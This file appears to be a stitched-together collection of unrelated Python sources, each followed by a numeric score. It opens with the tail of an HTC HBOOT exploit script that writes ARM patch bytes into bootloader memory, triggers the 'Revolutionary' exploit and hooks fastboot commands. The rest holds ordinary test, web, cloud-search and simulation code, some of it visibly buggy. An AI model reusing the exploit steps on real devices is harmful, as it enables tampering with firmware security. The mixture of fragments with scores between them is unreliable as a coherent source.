patch += b'\x00\xF0\x1F\xE5'
patch += b'\x10\x80\xBD\xE8'
patch += struct.pack('I', offsets['payload'])
data = dbg_write_memory(fbc, offsets['hb_keytest_hook'], patch)
data = dbg_write_memory(fbc, offsets['fb_oem_hook'], patch)
return (True, 'OK')
if __name__ == '__main__':
fbc = None
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--debug', action='store_true')
args = parser.parse_args()
def connect_to_device(args):
global fbc
not_connected = True
while not_connected:
try:
fbc = HbootClient(debug=args.debug)
not_connected = False
except Exception as e:
time.sleep(1)
return (True, 'OK')
step('Wait for device', connect_to_device, args)
step('Get HBOOT version', get_hboot_version, fbc)
step('Copy preloader', copy_preloader, fbc)
step('Trigger Revolutionary exploit', trigger_exploit, fbc)
step('Get HBOOT version', check_exploit_result, fbc)
step('Copy hbootdbg', copy_hbootdbg, fbc)
step('Patch fastboot oem and hboot keytest commands', patch_cmds, fbc)
fbc.close()
| 0.008701 |
# Authors: Robert Luke <[email protected]>
# Eric Larson <[email protected]>
# Alexandre Gramfort <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import pytest
import numpy as np
from mne.datasets.testing import data_path
from mne.io import read_raw_nirx, BaseRaw, read_raw_fif
from mne.preprocessing.nirs import optical_density, beer_lambert_law
from mne.utils import _validate_type
from mne.datasets import testing
from mne.externals.pymatreader import read_mat
fname_nirx_15_0 = op.join(data_path(download=False),
'NIRx', 'nirscout', 'nirx_15_0_recording')
fname_nirx_15_2 = op.join(data_path(download=False),
'NIRx', 'nirscout', 'nirx_15_2_recording')
fname_nirx_15_2_short = op.join(data_path(download=False),
'NIRx', 'nirscout',
'nirx_15_2_recording_w_short')
@testing.requires_testing_data
@pytest.mark.parametrize('fname', ([fname_nirx_15_2_short, fname_nirx_15_2,
fname_nirx_15_0]))
@pytest.mark.parametrize('fmt', ('nirx', 'fif'))
def test_beer_lambert(fname, fmt, tmpdir):
"""Test converting NIRX files."""
assert fmt in ('nirx', 'fif')
raw = read_raw_nirx(fname)
if fmt == 'fif':
raw.save(tmpdir.join('test_raw.fif'))
raw = read_raw_fif(tmpdir.join('test_raw.fif'))
assert 'fnirs_cw_amplitude' in raw
assert 'fnirs_od' not in raw
raw = optical_density(raw)
_validate_type(raw, BaseRaw, 'raw')
assert 'fnirs_cw_amplitude' not in raw
assert 'fnirs_od' in raw
assert 'hbo' not in raw
raw = beer_lambert_law(raw)
_validate_type(raw, BaseRaw, 'raw')
assert 'fnirs_cw_amplitude' not in raw
assert 'fnirs_od' not in raw
assert 'hbo' in raw
assert 'hbr' in raw
@testing.requires_testing_data
def test_beer_lambert_unordered_errors():
"""NIRS data requires specific ordering and naming of channels."""
raw = read_raw_nirx(fname_nirx_15_0)
raw_od = optical_density(raw)
raw_od.pick([0, 1, 2])
with pytest.raises(ValueError, match='ordered'):
beer_lambert_law(raw_od)
# Test that an error is thrown if channel naming frequency doesn't match
# what is stored in loc[9], which should hold the light frequency too.
raw_od = optical_density(raw)
raw_od.rename_channels({'S2_D2 760': 'S2_D2 770'})
with pytest.raises(ValueError, match='frequency do not match'):
beer_lambert_law(raw_od)
# Test that an error is thrown if inconsistent frequencies used in data
raw_od.info['chs'][2]['loc'][9] = 770.0
with pytest.raises(ValueError, match='pairs with frequencies'):
beer_lambert_law(raw_od)
@testing.requires_testing_data
def test_beer_lambert_v_matlab():
"""Compare MNE results to MATLAB toolbox."""
raw = read_raw_nirx(fname_nirx_15_0)
raw = optical_density(raw)
raw = beer_lambert_law(raw, ppf=0.121)
raw._data *= 1e6 # Scale to uM for comparison to MATLAB
matlab_fname = op.join(data_path(download=False),
'NIRx', 'nirscout', 'validation',
'nirx_15_0_recording_bl.mat')
matlab_data = read_mat(matlab_fname)
for idx in range(raw.get_data().shape[0]):
mean_error = np.mean(matlab_data['data'][:, idx] -
raw._data[idx])
assert mean_error < 0.1
matlab_name = ("S" + str(int(matlab_data['sources'][idx])) +
"_D" + str(int(matlab_data['detectors'][idx])) +
" " + matlab_data['type'][idx])
assert raw.info['ch_names'][idx] == matlab_name
| 0 |
import json
from django.test.client import RequestFactory
from django.core.urlresolvers import resolve, Resolver404
__version__ = '0.1.1'
# Version synonym
VERSION = __version__
class WebSocketRequest(object):
def __init__(self, message, factory_defaults=None):
self.message = message
self.factory_defaults = factory_defaults
self.error = None
self.validate()
def get_url(self):
return self.json_message.get('url')
def get_method(self):
return self.json_message.get('method', 'GET').lower()
def get_data(self):
return self.json_message.get('data', {})
def get_token(self):
return self.json_message.get('token')
def set_error(self, error_message, status_code=400):
self.error = {
'error': error_message,
'status_code': status_code
}
def validate(self):
if self.is_valid_message():
self.url = self.get_url()
self.method = self.get_method()
self.data = self.get_data()
self.token = self.get_token()
if self.url:
self.get_url_resolver_match()
else:
self.set_error('Missing URL')
def is_valid(self):
return not self.error
def is_valid_message(self):
try:
self.json_message = json.loads(self.message)
except ValueError:
self.set_error('Invalid formatted message.')
return False
return True
def get_url_resolver_match(self):
try:
return resolve(self.url)
except Resolver404:
self.set_error('Resource not found.', 404)
def get_factory(self):
defaults = {}
if self.token:
defaults['HTTP_AUTHORIZATION'] = "JWT {0}".format(self.token)
if self.factory_defaults:
defaults.update(self.factory_defaults)
return RequestFactory(**defaults)
def get_request(self, factory):
if self.method != 'get':
self.data = json.dumps(self.data)
return getattr(factory, self.method)(
self.url,
self.data,
content_type='application/json'
)
def get_view(self, resolver_match, request):
args = resolver_match.args
kwargs = resolver_match.kwargs
return resolver_match.func(request, *args, **kwargs)
def get_response(self):
if self.is_valid():
factory = self.get_factory()
request = self.get_request(factory)
resolver_match = self.get_url_resolver_match()
view = self.get_view(resolver_match, request)
return view
return self.error
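# Minimal usage sketch (assumed URL, payload and token, matching the keys
# read by get_url/get_method/get_data/get_token above); assumes a configured
# Django URLconf so resolve() can find the view.
def _demo():
    message = json.dumps({
        'url': '/api/items/',
        'method': 'POST',
        'data': {'name': 'example'},
        'token': 'abc123',
    })
    request = WebSocketRequest(message)
    return request.get_response()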
| 0 |
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto.exception
from boto.compat import json
import requests
import boto
class SearchServiceException(Exception):
pass
class CommitMismatchError(Exception):
pass
class EncodingError(Exception):
"""
Content sent for Cloud Search indexing was incorrectly encoded.
This usually happens when a document is marked as unicode but non-unicode
characters are present.
"""
pass
class ContentTooLongError(Exception):
"""
Content sent for Cloud Search indexing was too long
This will usually happen when documents queued for indexing add up to more
than the limit allowed per upload batch (5MB)
"""
pass
class DocumentServiceConnection(object):
"""
A CloudSearch document service.
The DocumentServiceConection is used to add, remove and update documents in
CloudSearch. Commands are uploaded to CloudSearch in SDF (Search Document Format).
To generate an appropriate SDF, use :func:`add` to add or update documents,
as well as :func:`delete` to remove documents.
Once the set of documents is ready to be index, use :func:`commit` to send the
commands to CloudSearch.
If there are a lot of documents to index, it may be preferable to split the
generation of SDF data and the actual uploading into CloudSearch. Retrieve
the current SDF with :func:`get_sdf`. If this file is the uploaded into S3,
it can be retrieved back afterwards for upload into CloudSearch using
:func:`add_sdf_from_s3`.
The SDF is not cleared after a :func:`commit`. If you wish to continue
using the DocumentServiceConnection for another batch upload of commands,
you will need to :func:`clear_sdf` first to stop the previous batch of
commands from being uploaded again.
"""
def __init__(self, domain=None, endpoint=None):
self.domain = domain
self.endpoint = endpoint
if not self.endpoint:
self.endpoint = domain.doc_service_endpoint
self.documents_batch = []
self._sdf = None
def add(self, _id, version, fields, lang='en'):
"""
Add a document to be processed by the DocumentService
The document will not actually be added until :func:`commit` is called
:type _id: string
:param _id: A unique ID used to refer to this document.
:type version: int
:param version: Version of the document being indexed. If a file is
being reindexed, the version should be higher than the existing one
in CloudSearch.
:type fields: dict
:param fields: A dictionary of key-value pairs to be uploaded .
:type lang: string
:param lang: The language code the data is in. Only 'en' is currently
supported
"""
d = {'type': 'add', 'id': _id, 'version': version, 'lang': lang,
'fields': fields}
self.documents_batch.append(d)
def delete(self, _id, version):
"""
Schedule a document to be removed from the CloudSearch service
The document will not actually be scheduled for removal until :func:`commit` is called
:type _id: string
:param _id: The unique ID of this document.
:type version: int
:param version: Version of the document to remove. The delete will only
occur if this version number is higher than the version currently
in the index.
"""
d = {'type': 'delete', 'id': _id, 'version': version}
self.documents_batch.append(d)
def get_sdf(self):
"""
Generate the working set of documents in Search Data Format (SDF)
:rtype: string
:returns: JSON-formatted string of the documents in SDF
"""
return self._sdf if self._sdf else json.dumps(self.documents_batch)
def clear_sdf(self):
"""
Clear the working documents from this DocumentServiceConnection
This should be used after :func:`commit` if the connection will be reused
for another set of documents.
"""
self._sdf = None
self.documents_batch = []
def add_sdf_from_s3(self, key_obj):
"""
Load an SDF from S3
Using this method will result in documents added through
:func:`add` and :func:`delete` being ignored.
:type key_obj: :class:`boto.s3.key.Key`
:param key_obj: An S3 key which contains an SDF
"""
#@todo:: (lucas) would be nice if this could just take an s3://uri..."
self._sdf = key_obj.get_contents_as_string()
def commit(self):
"""
Actually send an SDF to CloudSearch for processing
If an SDF file has been explicitly loaded it will be used. Otherwise,
documents added through :func:`add` and :func:`delete` will be used.
:rtype: :class:`CommitResponse`
:returns: A summary of documents added and deleted
"""
sdf = self.get_sdf()
if ': null' in sdf:
boto.log.error('null value in sdf detected. This will probably raise '
'500 error.')
index = sdf.index(': null')
boto.log.error(sdf[index - 100:index + 100])
url = "http://%s/2011-02-01/documents/batch" % (self.endpoint)
# Keep-alive is automatic in a post-1.0 requests world.
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(
pool_connections=20,
pool_maxsize=50,
max_retries=5
)
session.mount('http://', adapter)
session.mount('https://', adapter)
r = session.post(url, data=sdf, headers={'Content-Type': 'application/json'})
return CommitResponse(r, self, sdf)
class CommitResponse(object):
"""Wrapper for response to Cloudsearch document batch commit.
:type response: :class:`requests.models.Response`
:param response: Response from Cloudsearch /documents/batch API
:type doc_service: :class:`boto.cloudsearch.document.DocumentServiceConnection`
:param doc_service: Object containing the documents posted and methods to
retry
:raises: :class:`boto.exception.BotoServerError`
:raises: :class:`boto.cloudsearch.document.SearchServiceException`
:raises: :class:`boto.cloudsearch.document.EncodingError`
:raises: :class:`boto.cloudsearch.document.ContentTooLongError`
"""
def __init__(self, response, doc_service, sdf):
self.response = response
self.doc_service = doc_service
self.sdf = sdf
try:
self.content = json.loads(response.content)
except:
boto.log.error('Error indexing documents.\nResponse Content:\n{0}\n\n'
'SDF:\n{1}'.format(response.content, self.sdf))
raise boto.exception.BotoServerError(self.response.status_code, '',
body=response.content)
self.status = self.content['status']
if self.status == 'error':
self.errors = [e.get('message') for e in self.content.get('errors',
[])]
for e in self.errors:
if "Illegal Unicode character" in e:
raise EncodingError("Illegal Unicode character in document")
elif e == "The Content-Length is too long":
raise ContentTooLongError("Content was too long")
else:
self.errors = []
self.adds = self.content['adds']
self.deletes = self.content['deletes']
self._check_num_ops('add', self.adds)
self._check_num_ops('delete', self.deletes)
def _check_num_ops(self, type_, response_num):
"""Raise exception if number of ops in response doesn't match commit
:type type_: str
:param type_: Type of commit operation: 'add' or 'delete'
:type response_num: int
:param response_num: Number of adds or deletes in the response.
:raises: :class:`boto.cloudsearch.document.CommitMismatchError`
"""
commit_num = len([d for d in self.doc_service.documents_batch
if d['type'] == type_])
if response_num != commit_num:
raise CommitMismatchError(
'Incorrect number of {0}s returned. Commit: {1} Response: {2}'\
.format(type_, commit_num, response_num))
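# Minimal usage sketch of the add/delete/commit workflow described in the
# DocumentServiceConnection docstring; the endpoint value is an assumption.
def _demo(endpoint='doc-demo.us-east-1.cloudsearch.amazonaws.com'):
    conn = DocumentServiceConnection(endpoint=endpoint)
    conn.add('doc-1', 1, {'title': 'Hello', 'content': 'First document'})
    conn.delete('doc-0', 2)
    response = conn.commit()          # uploads the SDF batch
    print('added %s, deleted %s' % (response.adds, response.deletes))
    conn.clear_sdf()                  # required before reusing the connection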
| 0.002303 |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from django.core.urlresolvers import reverse
from libs.sql import get_user_tree_count, get_user_surveyed_species
from apps.users.forms import PrivacySettingsForm
from apps.users.models import achievements, update_achievements
_FOLLOWED_GROUP_CHUNK_SIZE = 2
_RESERVATION_CHUNK_SIZE = 2
def user_profile_context(user, its_me=True, home_page=True):
block_count = user.blocks_mapped_count
tree_count = get_user_tree_count(user)
species_surveyed = get_user_surveyed_species(user)
# Distinct count, not total
species_count = len(species_surveyed)
event_count = user.eventregistration_set \
.filter(did_attend=True) \
.count()
# In order to show the tree count in a "ticker" we need to break it up
# into digits and pad it with zeroes.
tree_digits = [digit for digit in "{:07d}".format(tree_count)]
privacy_form = PrivacySettingsForm(instance=user)
contributions_title = 'Your Contributions' if its_me else 'Contributions'
earned_achievements = get_achievements_for_user(user)['achieved']
context = {
'user': user,
'viewing_own_profile': its_me,
'show_username': can_show_full_name(user, its_me),
'show_achievements': its_me or (len(earned_achievements) > 0 and
user.achievements_are_public),
'show_contributions': (not home_page and
(its_me or user.contributions_are_public)),
'contributions_title': contributions_title,
'show_groups': its_me or user.group_follows_are_public,
'show_individual_mapper': (user.individual_mapper and
(its_me or user.profile_is_public)),
'show_reservations': (user.individual_mapper and its_me),
'show_request_access': (its_me and
user.eligible_to_become_individual_mapper()),
'follows': _get_follows_context(user),
'reservations': _get_reservations_context(user),
'privacy_categories': get_privacy_categories(privacy_form),
'counts': {
'block': block_count,
'tree': tree_count,
'tree_digits': tree_digits,
'species': species_count,
'species_by_name': species_surveyed,
'event': event_count
},
'achievements': earned_achievements
}
return context
def can_show_full_name(user, its_me=False):
return ((its_me or user.real_name_is_public) and
(user.first_name or user.last_name))
def get_privacy_categories(form):
user = form.instance
def make_category(title, field_name):
return {
'title': title,
'field_name': field_name,
'is_public': getattr(user, field_name),
'form_field': form[field_name]
}
return [
make_category('Profile', 'profile_is_public'),
make_category('Name', 'real_name_is_public'),
make_category('Groups', 'group_follows_are_public'),
make_category('Contributions', 'contributions_are_public'),
make_category('Rewards', 'achievements_are_public'),
]
def get_achievements_for_user(user):
if user.is_authenticated():
update_achievements(user)
user_achievements = set(user.achievement_set
.order_by('created_at')
.values_list('achievement_id', flat=True))
else:
user_achievements = set()
return {
'achieved': [(key, achievements[key])
for key in achievements.iterkeys()
if key in user_achievements],
'remaining': [
(key, achievements[key])
for key in achievements.iterkeys()
if key not in user_achievements and achievements[key].active],
'all': achievements
}
def _get_list_section_context(key, qs, chunk_size):
count = qs.count()
hidden_count = count - chunk_size
return {
'count': count,
'chunk_size': chunk_size,
'hidden_count': hidden_count,
key: qs
}
def _get_follows_context(user):
follows = user.follow_set.select_related('group').order_by('created_at')
return _get_list_section_context('follows', follows,
_FOLLOWED_GROUP_CHUNK_SIZE)
def _get_reservations_context(user):
reservations = user.blockfacereservation_set\
.current()\
.select_related('blockface')\
.order_by('expires_at')
context = _get_list_section_context('reservations', reservations,
_RESERVATION_CHUNK_SIZE)
context['map_poll_url'] = reverse('reservations_map_pdf_poll')
return context
| 0 |
__author__ = 'bernhard'
import os
import shutil
import subprocess
from qa_jbt.utils.paths import create_paths
from jbt_berkeley_coref_resolution.CorefOutputParser import CorefOutputParser
def do_coreference(article_content, data_path=os.path.join('.', 'data'), max_memory=6):
temp_path = os.path.join(os.path.normpath(data_path), 'coref_temp')
jar_home = os.path.normpath(os.path.join(data_path, '..', '..', 'jbt_berkeley_coref_resolution'))
paths = {
'input': os.path.join(temp_path, 'input'),
'preprocess': os.path.join(temp_path, 'output_preprocessing'),
'output': os.path.join(temp_path, 'output_coref'),
'exec_p': os.path.join(temp_path, 'exec_p'),
'exec_c': os.path.join(temp_path, 'exec_c')
}
create_paths(data_path, temp_path, [paths['input'], paths['preprocess'], paths['output']])
# write to file
with open(os.path.join(paths['input'], 'article'), mode='w', encoding='utf-8') as o:
o.writelines(article_content)
# call preprocessor
try:
output = subprocess.check_output(
"java -cp berkeleycoref-1.1.jar "
"-Xmx{}g "
"edu.berkeley.nlp.coref.preprocess.PreprocessingDriver "
"++base.conf "
"-execDir {} "
"-inputDir {} "
"-outputDir {} "
"-skipSentenceSplitting true "
"-respectInputLineBreaks true".format(
max_memory, # max Heap size in GB
paths['exec_p'],
paths['input'],
paths['preprocess']
),
cwd=jar_home,
shell=True
)
print(output)
except subprocess.CalledProcessError as e:
print(e)
return None
# rename file for later use
os.rename(
os.path.join(paths['preprocess'], 'article'),
os.path.join(paths['preprocess'], 'article.auto_conll')
)
# extracting coreferences
try:
output = subprocess.check_output(
"java -jar -Xmx{}g berkeleycoref-1.1.jar "
"++base.conf "
"-execDir {} "
"-modelPath {} "
"-testPath {} "
"-outputPath {} "
"-mode PREDICT".format(
max_memory, # max memory for process
paths['exec_c'], # execDir for coreference
os.path.join('models', 'coref-rawtext-final.ser'), # model path
paths['preprocess'], # input path
os.path.join(paths['preprocess'], 'berkeley_output_temp') # output file
),
cwd=jar_home,
shell=True
)
print(output)
except subprocess.CalledProcessError as e:
print(e)
return None
# preparing output
with open(os.path.join(paths['preprocess'], 'berkeley_output_temp'), mode='r', encoding='utf-8') as input_file:
lines = input_file.readlines()
with open(os.path.join(paths['output'], 'article-coref-raw'), mode='w', encoding='utf-8') as output_file:
output_file.writelines(lines[1:-1])
# get parsed output file
lines = CorefOutputParser(os.path.join(paths['output'], 'article-coref-raw')).get_resolved_text()
# remove temp path after running
shutil.rmtree(temp_path)
return lines
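# Hypothetical invocation (the input path is an assumption; the berkeleycoref
# jar and model files must be present as laid out above):
#
#     with open('article.txt', encoding='utf-8') as f:
#         resolved_lines = do_coreference(f.readlines())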
| 0.002714 |
#!/usr/local/bin/python3
# -*- coding:utf-8 -*-
import __future__
import argparse
import os
import sys
from importlib import *
from shutil import rmtree
import script.rio as io
def build_case(case_path, output_dir, force_build = False):
'''
Build all physical/numerical data from case
'''
# If the directory does not exist, then build:
if not os.path.isdir(output_dir):
force_build = True
io.make_sure_path_exists(output_dir)
if not force_build:
last_modif = os.path.getmtime(os.path.join(case_path, 'chars.py'))
case_build_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'initial_condition')
for f in os.listdir(case_build_dir):
if f.endswith(".py"):
last_modif = max(last_modif, os.path.getmtime(os.path.join(case_build_dir, f)))
if last_modif < os.path.getctime(output_dir):
print('case already built')
sys.path.append(case_path)
import chars
qtyList = chars.quantityList
del sys.path[-1]
del sys.modules["chars"]
del chars
return list(qtyList)
print("Case path:", case_path)
sys.path.append(case_path)
# Reload chars also else, you build the case with the wrong characteristics
import chars as case
reload(case)
coords_to_uid = io.gen_coords_to_uid(case.Nx, case.Ny)
coords_to_bc = dict()
quantityDict = dict()
case.buildme(quantityDict, coords_to_uid, coords_to_bc)
# Merging uid and bc dictionaries
coords_to_uid_bc = io.gen_coords_to_uid_bc(case.Nx, case.Ny, case.BClayer)
ds = [coords_to_uid_bc, coords_to_bc]
coords_to_uid_and_bc = dict()
for coord in coords_to_bc:
coords_to_uid_and_bc[coord] = tuple(d.get(coord) for d in ds)
rmtree(output_dir, ignore_errors=True)
io.make_sure_path_exists(output_dir)
# Write scheme info
io.write_scheme_info(output_dir, case.T, case.CFL, case.gamma)
# Write domain
io.write_domain(output_dir, case.lx, case.ly, case.Nx, case.Ny, coords_to_uid, case.BClayer)
# Write boundary conditions
io.write_bc(output_dir, coords_to_uid_and_bc)
# Write quantities and boundary conditions if necessary
for q_name, q in quantityDict.items():
io.write_quantity(output_dir, q_name, q)
# Use quantity list from the characteristics.
q_name_list = list(case.quantityList)
# Del case and chars
del sys.path[-1]
del sys.modules["chars"]
del case
# Return path to case directory
return q_name_list
if __name__ == "__main__":
# Argument parser
parser = argparse.ArgumentParser(description="Build case tool")
parser.add_argument("-d", type = str, help = "Root directory")
parser.add_argument("-p", type = str, help = "Project name")
parser.add_argument("-c", type = str, help = "Case name")
args = parser.parse_args()
    # NOTE: build_case() expects (case_path, output_dir); the exact mapping
    # from (-d, -p, -c) to those paths is an assumption here.
    build_case(os.path.join(args.d, args.c), os.path.join(args.d, args.p))
| 0.007092 |
import numpy as np
from enum import Enum
import heapq
class CustomerTypes(Enum):
Innovator = 99
Early_Adopter = 96.5
Early_Majority = 83
Late_Majority = 49
Laggard = 15
class Product(object):
def __init__(self):
self.version = 0
        self.price = np.inf
self.innovation_points = 0.
self.quality = 0.
def change_params(self, params, bump_version=True):
if bump_version:
self.version += 1
        self.price = params.get('price', np.inf)
self.innovation_points = params.get('innovation', 0.)
self.quality = params.get('quality', 0.)
class Company(object):
    def __init__(self, name, market_share):
        self.name = name
        self.market_share = market_share
self.product = None
self.type = None
self.competitive_advantage = 0.
self.industry_attractiveness = 0.
self.environmental_stability = 0.
self.financial_strength = 0.
self.history = []
self.customer_loyalty = 3
self.space_params = {
'competitive_advantage': {
'market_share': 3,
'product_quality': 3,
'product_life_cycle': 3, # late to early
'product_replacement_cycle': 3, # variable to fixed
'customer_loyalty': self.customer_loyalty,
'know_how': 3,
'vertical_integration': 3,
},
'industry_attractiveness': {
'growth_potential': 3,
'profit_potential': 3,
'financial_stability': 3,
'know_how': 3,
'resource_utilization': 3,
'capital_intensity': 3,
'ease_of_entry': 3,
'capacity_utilization': 3,
},
'environmental_stability': {
'technological_changes': 3,
'rate_of_inflation': 3,
'demand_variability': 3,
'barriers_to_entry': 3,
'competitive_pressure': 3,
'price_elasticity_of_demand': 3,
'pressure_from_substitutes': 3
},
'financial_strength': {
'ROI': 3,
'leverage': 3,
'liquidity': 3,
'required_to_available_capital': 3,
'cash_flow': 3,
'ease_of_exit': 3,
'risk_doing_business': 3, # much to little
'inventory_turnover': 3,
}
}
def set_space_params(self, args=None):
# if args exist then add copy them to space params
if args:
for k in args:
if self.space_params.get(k, None):
for k2 in args[k]:
if self.space_params[k].get(k2, None):
self.space_params[k][k2] = args[k][k2]
# calculate the SPACE parameters
for key in self.space_params:
category_sum = 0
for i, category in enumerate(self.space_params[key]):
category_sum += self.space_params[key][category]
setattr(self, key, float(category_sum) / float(i + 1))
def set_space_values(self, ca, ia, es, fs):
self.competitive_advantage = ca
self.industry_attractiveness = ia
self.environmental_stability = es
self.financial_strength = fs
self._define_quadrant()
def _define_quadrant(self):
# TODO do this
attrs = [self.competitive_advantage,
self.industry_attractiveness,
self.environmental_stability,
self.financial_strength]
        maxes = heapq.nlargest(2, attrs)
        ind1 = attrs.index(maxes[0])
        ind2 = attrs.index(maxes[1])
def make_product(self, params):
self.product = Product()
self.product.change_params(params)
def make_move(self):
pass
class Customer(object):
def __init__(self):
self.type = None
self.sensitivity = {
'price': None,
'quality': None,
'features': None
}
self.product = None
self._define_type()
def decide_to_buy(self, companies):
# TODO make parameters to buy
scores = []
for company in companies:
temp_product = company.product
score = 0. # decided by loyalty, price , quality etc
scores.append(score)
        self.product = companies[scores.index(max(scores))].product
def _define_type(self):
"""
Use diffusion of innovations model to decide the customer type
"""
sigma = 1
mean = 0
r = np.random.normal(mean, sigma)
if mean <= r < sigma:
self.type = CustomerTypes.Late_Majority
if r >= sigma:
self.type = CustomerTypes.Laggard
if -sigma <= r < mean:
self.type = CustomerTypes.Early_Majority
if -2 * sigma <= r < -sigma:
self.type = CustomerTypes.Early_Adopter
if r <= - 2 * sigma:
self.type = CustomerTypes.Innovator
class Market(object):
def __init__(self, args):
self.growth_rate = args.get('growth_rate', 0.)
self.value = args.get('market_value', 0.)
self.customers = []
def add_customers(self, n_customers=100000):
"""
Adds customers to the market
:param n_customers: How many to add to the market
"""
for i in xrange(n_customers):
cust = Customer()
self.customers.append(cust)
def grow(self):
"""
Grows the market by adding more customers.
"""
self.add_customers(int(len(self.customers) * self.growth_rate))
# class Strategy(object):
#
# def __init__(self, product, params):
# pass
class TheGame(object):
def __init__(self, market, companies):
self.market = market
self.companies = companies[1:]
self.ours = companies[0]
def play(self):
pass
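# Hypothetical usage sketch wiring the classes above together; the growth
# rate, market value and product parameters are made-up numbers.
def _demo():
    market = Market({'growth_rate': 0.02, 'market_value': 1e6})
    market.add_customers(1000)
    company = Company('Acme', 0.3)
    company.make_product({'price': 100., 'innovation': 5., 'quality': 7.})
    company.set_space_params()
    game = TheGame(market, [company])
    game.play()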
| 0.000491 |